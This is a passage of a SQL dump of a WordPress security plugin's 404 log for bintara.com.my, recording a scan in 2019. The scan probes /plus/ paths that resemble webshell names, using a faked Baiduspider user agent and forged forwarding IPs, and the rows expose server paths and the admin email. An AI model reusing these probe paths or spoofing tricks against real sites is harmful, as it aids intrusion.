8f754017cf48a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"66.58.168.232\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydALDTiPzaBc@31OE0HAAAAQk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydALDTiPzaBc@31OE0HAAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydALDTiPzaBc@31OE0HAAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"58986\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:10:\"SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydALDTiPzaBc@31OE0HAAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544896.6856\";s:12:\"REQUEST_TIME\";s:10:\"1570544896\";}}','notice','2019-10-08 14:28:18','2019-10-08 14:28:17',35051448,36854440,'https://bintara.com.my/plus/mowang.php',1,0,'66.58.168.232'),(27721,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"170.209.200.210\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=971dcff048195366b7679282b1b2128b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"170.209.200.210\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydErDTiPzaBc@31OE0IQAAARc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydErDTiPzaBc@31OE0IQAAARc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydErDTiPzaBc@31OE0IQAAARc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"60904\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydErDTiPzaBc@31OE0IQAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544914.5238\";s:12:\"REQUEST_TIME\";s:10:\"1570544914\";}}','notice','2019-10-08 14:28:36','2019-10-08 14:28:34',35050760,36857096,'https://bintara.com.my/plus/mp.php',1,0,'170.209.200.210'),(27722,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/ms.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"102.150.43.166\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=40c6e2d2171ea0ffce7cdd55dbfb86d7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"102.150.43.166\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydGnURUVLSjYCXpcIzNAAAAMQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydGnURUVLSjYCXpcIzNAAAAMQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/ms.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydGnURUVLSjYCXpcIzNAAAAMQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"61303\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/ms.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/ms.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydGnURUVLSjYCXpcIzNAAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544922.4128\";s:12:\"REQUEST_TIME\";s:10:\"1570544922\";}}','notice','2019-10-08 14:28:43','2019-10-08 14:28:42',35051056,36856904,'https://bintara.com.my/plus/ms.php',1,0,'102.150.43.166'),(27723,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/mycak.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"123.107.226.128\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=5d50619e607e1c5c76cd24d7f962e294\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"123.107.226.128\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydKVQ75tQHORtJE8pnTwAAAFM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydKVQ75tQHORtJE8pnTwAAAFM\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydKVQ75tQHORtJE8pnTwAAAFM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62990\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mycak.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/mycak.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydKVQ75tQHORtJE8pnTwAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544938.0494\";s:12:\"REQUEST_TIME\";s:10:\"1570544938\";}}','notice','2019-10-08 14:28:59','2019-10-08 14:28:58',35045776,36858960,'https://bintara.com.my/plus/mycak.php',1,0,'123.107.226.128'),(27724,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/myjs.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"140.69.203.106\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2d7a78d40790e7a425c1d93562081a20\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"140.69.203.106\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydM7DTiPzaBc@31OE0PAAAAQk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydM7DTiPzaBc@31OE0PAAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydM7DTiPzaBc@31OE0PAAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"63647\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/myjs.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/myjs.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydM7DTiPzaBc@31OE0PAAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544947.7155\";s:12:\"REQUEST_TIME\";s:10:\"1570544947\";}}','notice','2019-10-08 14:29:09','2019-10-08 14:29:08',35051888,36850784,'https://bintara.com.my/plus/myjs.php',1,0,'140.69.203.106'),(27725,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/mysql.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"111.3.206.227\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=8876bab7aabbe535ae836846ab7b8062\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"111.3.206.227\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydO3URUVLSjYCXpcIzPgAAAME\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydO3URUVLSjYCXpcIzPgAAAME\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydO3URUVLSjYCXpcIzPgAAAME\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"64378\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydO3URUVLSjYCXpcIzPgAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544955.3569\";s:12:\"REQUEST_TIME\";s:10:\"1570544955\";}}','notice','2019-10-08 14:29:17','2019-10-08 14:29:15',35054472,36861560,'https://bintara.com.my/plus/mysql.php',1,0,'111.3.206.227'),(27726,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/plus/mytag_j.phpaid=6022\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"127.23.166.135\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=bee14ca26d783b8dcea59ae6146e8246\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; 